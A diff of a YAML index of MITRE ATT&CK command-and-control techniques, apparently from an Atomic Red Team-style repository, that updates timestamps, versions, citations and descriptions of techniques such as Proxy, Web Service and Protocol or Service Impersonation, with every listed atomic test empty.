         Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.
@@ -36956,7 +37431,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1572:
     technique:
@@ -36987,7 +37461,7 @@ command-and-control:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-27T17:15:35.372Z'
       name: Protocol Tunneling
       description: "Adversaries may tunnel network communications to and from a victim
         system within a separate protocol to avoid detection/network filtering and/or
@@ -37007,8 +37481,8 @@ command-and-control:
         encapsulated within encrypted HTTPS packets.(Citation: BleepingComp Godlua
         JUL19) \n\nAdversaries may also leverage [Protocol Tunneling](https://attack.mitre.org/techniques/T1572)
         in conjunction with [Proxy](https://attack.mitre.org/techniques/T1090) and/or
-        [Protocol Impersonation](https://attack.mitre.org/techniques/T1001/003) to
-        further conceal C2 communications and infrastructure. "
+        [Protocol or Service Impersonation](https://attack.mitre.org/techniques/T1001/003)
+        to further conceal C2 communications and infrastructure. "
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: command-and-control
@@ -37030,8 +37504,6 @@ command-and-control:
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Connection Creation'
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1572
     atomic_tests: []
   T1071.003:
@@ -37093,7 +37565,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1092:
     technique:
@@ -37141,7 +37612,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1090.002:
     technique:
@@ -37195,7 +37665,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1090:
     technique:
@@ -37228,7 +37697,7 @@ command-and-control:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-08-30T19:16:11.648Z'
       name: Proxy
       description: |-
         Adversaries may use a connection proxy to direct network traffic between systems or act as an intermediary for network communications to a command and control server to avoid direct connections to their infrastructure. Many tools exist that enable traffic redirection through proxies or port redirection, including [HTRAN](https://attack.mitre.org/software/S0040), ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools) Adversaries use these types of proxies to manage command and control communications, reduce the number of simultaneous outbound network connections, provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion. Adversaries may chain together multiple proxies to further disguise the source of malicious traffic.
@@ -37248,8 +37717,6 @@ command-and-control:
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Connection Creation'
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1568:
     technique:
@@ -37287,7 +37754,7 @@ command-and-control:
         url: https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/
         description: 'Jacobs, J. (2014, October 2). Building a DGA Classifier: Part
           2, Feature Engineering. Retrieved February 18, 2019.'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-11T18:26:23.782Z'
       name: Dynamic Resolution
       description: |-
         Adversaries may dynamically establish connections to command and control infrastructure to evade common detections and remediations. This may be achieved by using malware that shares a common algorithm with the infrastructure the adversary uses to receive the malware's communications. These calculations can be used to dynamically adjust parameters such as the domain name, IP address, or port number the malware uses for command and control.
@@ -37315,42 +37782,22 @@ command-and-control:
       x_mitre_permissions_required:
       - User
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1102:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Anastasios Pingios
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--830c9528-df21-472c-8c14-a036bf17d665
-      type: attack-pattern
-      created: '2017-05-31T21:31:13.915Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1102
-        url: https://attack.mitre.org/techniques/T1102
-      - url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
-        description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
-          & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
-        source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2024-10-07T17:53:54.380Z'
       name: Web Service
       description: |-
-        Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
+        Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites, cloud services, and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google, Microsoft, or Twitter, makes it easier for adversaries to hide in expected noise.(Citation: Broadcom BirdyClient Microsoft Graph API 2024) Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
 
         Use of Web services may also protect back-end C2 infrastructure from discovery through malware binary analysis while also enabling operational resiliency (since this infrastructure may be dynamically changed).
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: command-and-control
+      x_mitre_contributors:
+      - Anastasios Pingios
+      - Sarathkumar Rajendran, Microsoft Defender365
+      x_mitre_deprecated: false
       x_mitre_detection: 'Host data that can relate unknown or suspicious process
         activity using a network connection is important to supplement any existing
         indicators of compromise based on malware command and control signatures and
@@ -37359,17 +37806,39 @@ command-and-control:
         for uncommon data flows (e.g., a client sending significantly more data than
         it receives from a server). User behavior monitoring may help to detect abnormal
         patterns of activity.(Citation: University of Birmingham C2)'
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Traffic Content'
       - 'Network Traffic: Network Connection Creation'
-      x_mitre_permissions_required:
-      - User
-      x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--830c9528-df21-472c-8c14-a036bf17d665
+      created: '2017-05-31T21:31:13.915Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1102
+        external_id: T1102
+      - source_name: Broadcom BirdyClient Microsoft Graph API 2024
+        description: Broadcom. (2024, May 2). BirdyClient malware leverages Microsoft
+          Graph API for C&C communication. Retrieved July 1, 2024.
+        url: https://www.broadcom.com/support/security-center/protection-bulletin/birdyclient-malware-leverages-microsoft-graph-api-for-c-c-communication
+      - source_name: University of Birmingham C2
+        description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
+          & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
+        url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1568.003:
     technique:
@@ -37401,7 +37870,7 @@ command-and-control:
         description: Rapid7. (2013, August 26). Upcoming G20 Summit Fuels Espionage
           Operations. Retrieved March 6, 2017.
         url: https://blog.rapid7.com/2013/08/26/upcoming-g20-summit-fuels-espionage-operations/
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-27T20:54:28.287Z'
       name: DNS Calculation
       description: |-
         Adversaries may perform calculations on addresses returned in DNS results to determine which port and IP address to use for command and control, rather than relying on a predetermined port number or the actual returned IP address. A IP and/or port number calculation can be used to bypass egress filtering on a C2 channel.(Citation: Meyers Numbered Panda)
@@ -37418,8 +37887,6 @@ command-and-control:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1104:
     technique:
@@ -37439,7 +37906,7 @@ command-and-control:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1104
         external_id: T1104
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-07-14T19:43:38.181Z'
       name: Multi-Stage Channels
       description: |-
         Adversaries may create multiple stages for command and control that are employed under different conditions or for certain functions. Use of multiple stages may obfuscate the command and control channel to make detection more difficult.
@@ -37462,8 +37929,6 @@ command-and-control:
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Connection Creation'
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1205.001:
     technique:
@@ -37488,7 +37953,7 @@ command-and-control:
         description: 'Hartrell, Greg. (2002, August). Get a handle on cd00r: The invisible
           backdoor. Retrieved October 13, 2018.'
         source_name: Hartrell cd00r 2002
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-11T18:31:23.996Z'
       name: Port Knocking
       description: |-
         Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.
@@ -37513,8 +37978,6 @@ command-and-control:
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1071.002:
     technique:
@@ -37579,7 +38042,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1102.003:
     technique:
@@ -37603,7 +38065,7 @@ command-and-control:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-26T23:26:10.109Z'
       name: One-Way Communication
       description: |-
         Adversaries may use an existing, legitimate external Web service as a means for sending commands to a compromised system without receiving return output over the Web service channel. Compromised systems may leverage popular websites and social media to host command and control (C2) instructions. Those infected systems may opt to send the output from those commands back over a different C2 channel, including to another distinct Web service. Alternatively, compromised systems may return no output at all in cases where adversaries want to send instructions to systems and do not want a response.
@@ -37628,21 +38090,36 @@ command-and-control:
       - 'Network Traffic: Network Traffic Content'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1090.003:
     technique:
-      modified: '2024-04-19T13:24:36.872Z'
+      modified: '2024-09-25T20:48:24.411Z'
       name: 'Proxy: Multi-hop Proxy'
-      description: |-
-        Adversaries may chain together multiple proxies to disguise the source of malicious traffic. Typically, a defender will be able to identify the last proxy traffic traversed before it enters their network; the defender may or may not be able to identify any previous proxies before the last-hop proxy. This technique makes identifying the original source of the malicious traffic even more difficult by requiring the defender to trace malicious traffic through several proxies to identify its source.
-
-        For example, adversaries may construct or use onion routing networks – such as the publicly available [Tor](https://attack.mitre.org/software/S0183) network – to transport encrypted C2 traffic through a compromised population, allowing communication with any device within the network.(Citation: Onion Routing)
-
-        In the case of network infrastructure, it is possible for an adversary to leverage multiple compromised devices to create a multi-hop proxy chain (i.e., [Network Devices](https://attack.mitre.org/techniques/T1584/008)). By leveraging [Patch System Image](https://attack.mitre.org/techniques/T1601/001) on routers, adversaries can add custom code to the affected network devices that will implement onion routing between those nodes. This method is dependent upon the [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599) method allowing the adversaries to cross the protected network boundary of the Internet perimeter and into the organization’s Wide-Area Network (WAN).  Protocols such as ICMP may be used as a transport.
-
-        Similarly, adversaries may abuse peer-to-peer (P2P) and blockchain-oriented infrastructure to implement routing between a decentralized network of peers.(Citation: NGLite Trojan)
+      description: "Adversaries may chain together multiple proxies to disguise the
+        source of malicious traffic. Typically, a defender will be able to identify
+        the last proxy traffic traversed before it enters their network; the defender
+        may or may not be able to identify any previous proxies before the last-hop
+        proxy. This technique makes identifying the original source of the malicious
+        traffic even more difficult by requiring the defender to trace malicious traffic
+        through several proxies to identify its source.\n\nFor example, adversaries
+        may construct or use onion routing networks – such as the publicly available
+        [Tor](https://attack.mitre.org/software/S0183) network – to transport encrypted
+        C2 traffic through a compromised population, allowing communication with any
+        device within the network.(Citation: Onion Routing) Adversaries may also use
+        operational relay box (ORB) networks composed of virtual private servers (VPS),
+        Internet of Things (IoT) devices, smart devices, and end-of-life routers to
+        obfuscate their operations. (Citation: ORB Mandiant) \n\nIn the case of network
+        infrastructure, it is possible for an adversary to leverage multiple compromised
+        devices to create a multi-hop proxy chain (i.e., [Network Devices](https://attack.mitre.org/techniques/T1584/008)).
+        By leveraging [Patch System Image](https://attack.mitre.org/techniques/T1601/001)
+        on routers, adversaries can add custom code to the affected network devices
+        that will implement onion routing between those nodes. This method is dependent
+        upon the [Network Boundary Bridging](https://attack.mitre.org/techniques/T1599)
+        method allowing the adversaries to cross the protected network boundary of
+        the Internet perimeter and into the organization’s Wide-Area Network (WAN).
+        \ Protocols such as ICMP may be used as a transport.  \n\nSimilarly, adversaries
+        may abuse peer-to-peer (P2P) and blockchain-oriented infrastructure to implement
+        routing between a decentralized network of peers.(Citation: NGLite Trojan)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: command-and-control
@@ -37661,7 +38138,7 @@ command-and-control:
       - macOS
       - Windows
       - Network
-      x_mitre_version: '2.1'
+      x_mitre_version: '2.2'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Traffic Content'
@@ -37675,6 +38152,11 @@ command-and-control:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1090/003
         external_id: T1090.003
+      - source_name: ORB Mandiant
+        description: Raggi, Michael. (2024, May 22). IOC Extinction? China-Nexus Cyber
+          Espionage Actors Use ORB Networks to Raise Cost on Defenders. Retrieved
+          July 8, 2024.
+        url: https://cloud.google.com/blog/topics/threat-intelligence/china-nexus-espionage-orb-networks
       - source_name: NGLite Trojan
         description: Robert Falcone, Jeff White, and Peter Renals. (2021, November
           7). Targeted Attack Campaign Against ManageEngine ADSelfService Plus Delivers
@@ -37688,12 +38170,11 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1090.003
     atomic_tests: []
   T1001:
     technique:
-      modified: '2024-02-02T19:04:35.389Z'
+      modified: '2024-10-07T15:07:47.232Z'
       name: Data Obfuscation
       description: 'Adversaries may obfuscate command and control traffic to make
         it more difficult to detect.(Citation: Bitdefender FunnyDream Campaign November
@@ -37743,11 +38224,10 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1571:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2024-09-12T19:37:57.868Z'
       name: Non-Standard Port
       description: |-
         Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088(Citation: Symantec Elfin Mar 2019) or port 587(Citation: Fortinet Agent Tesla April 2018) as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
@@ -37756,20 +38236,20 @@ command-and-control:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: command-and-control
+      x_mitre_deprecated: false
       x_mitre_detection: 'Analyze packet contents to detect communications that do
         not follow the expected protocol behavior for the port that is being used.
         Analyze network data for uncommon data flows (e.g., a client sending significantly
         more data than it receives from a server). Processes utilizing the network
         that do not normally have network communication or have never been seen before
         are suspicious.(Citation: University of Birmingham C2)'
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Linux
       - macOS
       - Windows
-      x_mitre_is_subtechnique: false
-      x_mitre_deprecated: false
-      x_mitre_domains:
-      - enterprise-attack
       x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Flow'
@@ -37794,17 +38274,16 @@ command-and-control:
         url: https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage
       - source_name: change_rdp_port_conti
         description: 'The DFIR Report. (2022, March 1). "Change RDP port" #ContiLeaks.
-          Retrieved March 1, 2022.'
-        url: https://twitter.com/TheDFIRReport/status/1498657772254240768
+          Retrieved September 12, 2024.'
+        url: https://x.com/TheDFIRReport/status/1498657772254240768
       - source_name: Fortinet Agent Tesla April 2018
         description: Zhang, X. (2018, April 05). Analysis of New Agent Tesla Spyware
           Variant. Retrieved November 5, 2018.
         url: https://www.fortinet.com/blog/threat-research/analysis-of-new-agent-tesla-spyware-variant.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1571
     atomic_tests: []
   T1573:
@@ -37860,7 +38339,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1573
     atomic_tests: []
   T1102.002:
@@ -37885,7 +38363,7 @@ command-and-control:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-26T23:15:47.861Z'
       name: Bidirectional Communication
       description: "Adversaries may use an existing, legitimate external Web service
         as a means for sending commands to and receiving output from a compromised
@@ -37922,8 +38400,6 @@ command-and-control:
       - 'Network Traffic: Network Traffic Flow'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1573.002:
     technique:
@@ -37977,7 +38453,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1095:
     technique:
@@ -38049,33 +38524,12 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1095
     atomic_tests: []
   T1001.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - Windows
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--c325b232-d5bc-4dde-a3ec-71f3db9e8adc
-      type: attack-pattern
-      created: '2020-03-15T00:40:27.503Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1001.003
-        url: https://attack.mitre.org/techniques/T1001/003
-      - url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
-        description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
-          & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
-        source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
-      name: Protocol Impersonation
+      modified: '2024-10-09T15:40:19.436Z'
+      name: Protocol or Service Impersonation
       description: "Adversaries may impersonate legitimate protocols or web service
         traffic to disguise command and control activity and thwart analysis efforts.
         By impersonating legitimate protocols or web services, adversaries can make
@@ -38083,23 +38537,61 @@ command-and-control:
         \ \n\nAdversaries may impersonate a fake SSL/TLS handshake to make it look
         like subsequent traffic is SSL/TLS encrypted, potentially interfering with
         some security tooling, or to make the traffic look like it is related with
-        a trusted entity. "
+        a trusted entity. \n\nAdversaries may also leverage legitimate protocols to
+        impersonate expected web traffic or trusted services. For example, adversaries
+        may manipulate HTTP headers, URI endpoints, SSL certificates, and transmitted
+        data to disguise C2 communications or mimic legitimate services such as Gmail,
+        Google Drive, and Yahoo Messenger.(Citation: ESET Okrum July 2019)(Citation:
+        Malleable-C2-U42)"
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: command-and-control
+      x_mitre_contributors:
+      - James Emery-Callcott, Emerging Threats Team, Proofpoint
+      x_mitre_deprecated: false
       x_mitre_detection: 'Analyze network data for uncommon data flows (e.g., a client
         sending significantly more data than it receives from a server). Processes
         utilizing the network that do not normally have network communication or have
         never been seen before are suspicious. Analyze packet contents to detect communications
         that do not follow the expected protocol behavior for the port that is being
         used.(Citation: University of Birmingham C2)'
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - Windows
+      - macOS
+      x_mitre_version: '2.0'
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--c325b232-d5bc-4dde-a3ec-71f3db9e8adc
+      created: '2020-03-15T00:40:27.503Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1001/003
+        external_id: T1001.003
+      - source_name: Malleable-C2-U42
+        description: 'Chris Navarrete Durgesh Sangvikar Andrew Guan Yu Fu Yanhui Jia
+          Siddhart Shibiraj. (2022, March 16). Cobalt Strike Analysis and Tutorial:
+          How Malleable C2 Profiles Make Cobalt Strike Difficult to Detect. Retrieved
+          September 24, 2024.'
+        url: https://unit42.paloaltonetworks.com/cobalt-strike-malleable-c2-profile/
+      - source_name: University of Birmingham C2
+        description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
+          & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
+        url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
+      - source_name: ESET Okrum July 2019
+        description: 'Hromcova, Z. (2019, July). OKRUM AND KETRICAN: AN OVERVIEW OF
+          RECENT KE3CHANG GROUP ACTIVITY. Retrieved May 6, 2020.'
+        url: https://www.welivesecurity.com/wp-content/uploads/2019/07/ESET_Okrum_and_Ketrican.pdf
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
     atomic_tests: []
   T1090.004:
     technique:
@@ -38146,7 +38638,6 @@ command-and-control:
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
-      spec_version: '2.1'
     atomic_tests: []
   T1132:
     technique:
@@ -38206,7 +38697,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1132.002:
     technique:
@@ -38238,7 +38728,7 @@ command-and-control:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-14T23:39:50.117Z'
       name: Non-Standard Encoding
       description: 'Adversaries may encode data with a non-standard data encoding
         system to make the content of command and control traffic more difficult to
@@ -38264,8 +38754,6 @@ command-and-control:
       - 'Network Traffic: Network Traffic Content'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1071.001:
     technique:
@@ -38332,7 +38820,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1071.001
     atomic_tests: []
   T1105:
@@ -38430,7 +38917,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1105
     atomic_tests: []
   T1665:
@@ -38523,7 +39009,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1001.002:
     technique:
@@ -38547,7 +39032,7 @@ command-and-control:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-15T00:37:58.963Z'
       name: Data Obfuscation via Steganography
       description: 'Adversaries may use steganographic techniques to hide command
         and control traffic to make detection efforts more difficult. Steganographic
@@ -38570,8 +39055,6 @@ command-and-control:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Network Traffic: Network Traffic Content'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1001.002
     atomic_tests: []
   T1008:
@@ -38596,7 +39079,7 @@ command-and-control:
         description: Gardiner, J.,  Cova, M., Nagaraja, S. (2014, February). Command
           & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
         source_name: University of Birmingham C2
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-07-14T19:49:47.340Z'
       name: Fallback Channels
       description: Adversaries may use fallback or alternate communication channels
         if the primary channel is compromised or inaccessible in order to maintain
@@ -38616,8 +39099,6 @@ command-and-control:
       - 'Network Traffic: Network Traffic Flow'
       - 'Network Traffic: Network Connection Creation'
       x_mitre_is_subtechnique: false
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1090.001:
     technique:
@@ -38671,7 +39152,6 @@ command-and-control:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1090.001
     atomic_tests: []
   T1102.001:
@@ -38696,7 +39176,7 @@ command-and-control:
